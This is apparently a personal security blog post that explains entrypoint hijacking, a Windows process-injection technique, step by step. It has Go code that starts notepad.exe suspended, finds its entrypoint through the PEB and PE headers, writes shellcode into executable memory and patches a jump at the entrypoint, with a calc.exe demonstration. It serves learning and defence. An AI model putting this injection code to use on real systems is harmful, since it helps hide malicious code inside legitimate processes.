Malware Development: Entrypoint hijacking
This blog post is for educational purposes only. The techniques described here are commonly used by malware but are also essential for security researchers and defenders to understand. All testing should be conducted in controlled lab environments only. Never attempt these techniques against systems you don't own or have explicit permission to test.
Comments
I wanted to use Go for this project as it's a language I am working on polishing my skills with at the moment. With that said, after diving into this, I think NIM is probably just better for this kind of work. (Winim is much more mature)
The full code can be accessed here.
This post documents my journey down the process injection TTP rabbit hole. On a scale of evasiveness, I'd rate this technique above average, with CreateRemoteThread being bottom-of-the-barrel and APC queuing at the average?
I don't know enough about EDR/AV to confidently say this, so take that with a grain of salt.
Despite this technique being detectable (process memory will reveal the tampering), it's somewhat evasive by executing within a legitimate process.
Understanding Process Injection
Process injection remains one of the most effective techniques in malware development and offensive security. While full process hollowing involves replacing the entire image of a process, this post examines a more targeted approach - entrypoint hijacking. This technique redirects execution at the entrypoint of a legitimate process to malicious code without replacing the entire process image, allowing attackers to execute arbitrary code while maintaining the outward appearance of the original process. It is also more reliable, as modern Windows has many more complexities involved in process execution.
When injecting code into a process, several key steps are involved:
- Create/attach to a target process
- Allocate memory in the target process
- Write shellcode to the allocated memory
- Redirect execution to the injected code
This process relies on understanding memory structures and the Windows PE file format.
Windows Process Structure
The PE (Portable Executable) format contains several important components for process injection:
- PEB (Process Environment Block) - Contains process information
- Image Base Address - Where the executable is loaded in memory
- Entrypoint - Where execution begins
By navigating these structures, we can locate precisely where to inject our code. My favourite resource for a high-level summary of Windows PE files is this blog post.
Creating a Suspended Process
GO1targetPath := windows.StringToUTF16Ptr("C:\\Windows\\System32\\notepad.exe") 2var pi windows.ProcessInformation 3var si windows.StartupInfo 4si.Cb = uint32(unsafe.Sizeof(si)) 5 6// Create the process in a suspended state 7err := windows.CreateProcess( 8 nil, // lpApplicationName 9 targetPath, // lpCommandLine 10 nil, // lpProcessAttributes 11 nil, // lpThreadAttributes 12 false, // bInheritHandles 13 windows.CREATE_SUSPENDED, // dwCreationFlags 14 nil, // lpEnvironment 15 nil, // lpCurrentDirectory 16 &si, // lpStartupInfo 17 &pi) // lpProcessInformation
The 'CREATE_SUSPENDED' flag is critical here - it ensures the process doesn't begin execution until we're ready. I've left the parameters to the CreateProcess API, these are ripped straight from the docs.
Finding the Entrypoint
The most interesting part (in my opinion) involves navigating the PE file structure to find the entrypoint.
GO1// Get basic process information 2var pbi windows.PROCESS_BASIC_INFORMATION 3var returnLen uint32 4res := windows.NtQueryInformationProcess( 5 pi.Process, 6 windows.ProcessBasicInformation, 7 unsafe.Pointer(&pbi), 8 uint32(unsafe.Sizeof(pbi)), 9 &returnLen) 10 11// Read the ImageBaseAddress from the PEB 12pebAddr := uintptr(unsafe.Pointer(pbi.PebBaseAddress)) 13imageBaseAddrPtr := pebAddr + 0x10 14var imageBaseAddr uintptr 15var bytesRead uintptr 16 17err = windows.ReadProcessMemory( 18 pi.Process, 19 imageBaseAddrPtr, 20 (*byte)(unsafe.Pointer(&imageBaseAddr)), 21 unsafe.Sizeof(imageBaseAddr), 22 &bytesRead)
Next, we navigate the PE header to find the entrypoint offset:
A good resource, and graphic is from this post on Github. This explains the actual offsets within PE structures, in order to extract where in memory specific addresses are (i.e. entrypoint).
GO1// Find the entrypoint 2var e_lfanew uint32 3err = windows.ReadProcessMemory( 4 pi.Process, 5 imageBaseAddr+0x3C, 6 (*byte)(unsafe.Pointer(&e_lfanew)), 7 unsafe.Sizeof(e_lfanew), 8 &bytesRead) 9 10peHeaderAddr := imageBaseAddr + uintptr(e_lfanew) 11addressOfEntryPointOffset := peHeaderAddr + 0x28 12var addressOfEntryPoint uint32 13 14err = windows.ReadProcessMemory( 15 pi.Process, 16 addressOfEntryPointOffset, 17 (*byte)(unsafe.Pointer(&addressOfEntryPoint)), 18 unsafe.Sizeof(addressOfEntryPoint), 19 &bytesRead) 20 21entryPointAddr := imageBaseAddr + uintptr(addressOfEntryPoint)
Creating the JMP Instruction
A critical element is the assembly jump instruction that redirects execution:
GO1// Create a JMP instruction to the given address (for x64) 2func createJmpToInstruction(targetAddr uintptr) []byte { 3 4 jmpCode := make([]byte, 12) 5 jmpCode[0] = 0x48 6 jmpCode[1] = 0xB8 7 8 // Copy target address to the instruction 9 targetAddrBytes := (*[8]byte)(unsafe.Pointer(&targetAddr)) 10 copy(jmpCode[2:10], targetAddrBytes[:]) 11 12 jmpCode[10] = 0xFF 13 jmpCode[11] = 0xE0 14 15 return jmpCode 16}
This function creates the machine code that will redirect execution to our shellcode. It generates an x64 instruction sequence that loads our address into the RAX register and jumps to it. This is just a generic shellcode, if you don't understand it don't worry, everyone uses something along the lines of this to perform JMPs to arbitrary addresses, I guarantee you could find something very similar in actual malware samples.
Allocating Memory for Shellcode
We allocate memory within the target process for our shellcode:
GO1// Allocate memory for our shellcode 2shellcodeAddr, err := VirtualAllocEx( 3 pi.Process, 4 0, // Let Windows choose the address 5 uintptr(len(shellcode)), 6 MEM_COMMIT|MEM_RESERVE, 7 PAGE_EXECUTE_READWRITE)
It's important to note that VirtualAllocEx
allocates memory directly within the target process's address space, not in our own process. This is a key distinction from other techniques like CreateRemoteThread, where you might also allocate memory in the target process but execute it differently.
Writing Shellcode and Modifying the Entrypoint
After writing the shellcode to the allocated memory, we modify memory protection to allow writing to the entrypoint:
GO1// Change memory protection at entrypoint to allow writing 2var oldProtect uint32 3err = VirtualProtectEx( 4 pi.Process, 5 entryPointAddr, 6 uintptr(len(jmpInstruction)), 7 PAGE_EXECUTE_READWRITE, 8 &oldProtect) 9 10// Write JMP instruction at the entrypoint 11err = windows.WriteProcessMemory( 12 pi.Process, 13 entryPointAddr, 14 &jmpInstruction[0], 15 uintptr(len(jmpInstruction)), 16 &bytesWritten) 17 18// Restore original memory protection 19err = VirtualProtectEx( 20 pi.Process, 21 entryPointAddr, 22 uintptr(len(jmpInstruction)), 23 oldProtect, 24 &oldProtect)
Handling Instruction Cache
Modern CPUs cache instructions, requiring us to flush the cache:
GO1// Flush instruction cache to ensure the processor sees our changes 2err = FlushInstructionCache( 3 pi.Process, 4 entryPointAddr, 5 uintptr(len(jmpInstruction)))
Resuming Execution
Finally, we resume the process:
GO1// Resume the suspended thread 2_, err = windows.ResumeThread(pi.Thread)
Observing the Technique in Action
To demonstrate this technique, the code includes pause points where you can use a debugger to examine the process before and after modification. Using a tool like x64dbg:
The following excerpt is the 'notepad.exe' process in its suspended state. Note the RCX register value, this is pointing to the entrypoint of the process & therefore the target of where we want to patch our jump instruction.
The following two images are before and after our patching occurs. The first is the initial program before we write our jump instruction to the entrypoint:
And this is after:
Finally, this is a GIF to document the full execution. You can see me showing before and after the entrypoint is patched, then following the jump in the process memory to where the actual shellcode has been written; and then our calc.exe pops to confirm our PoC.
References
- https://malapi.io
- https://github.com/golang/sys
- https://github.com/xdavidel/NimHollow/tree/main
- https://attack.mitre.org/techniques/T1055/012/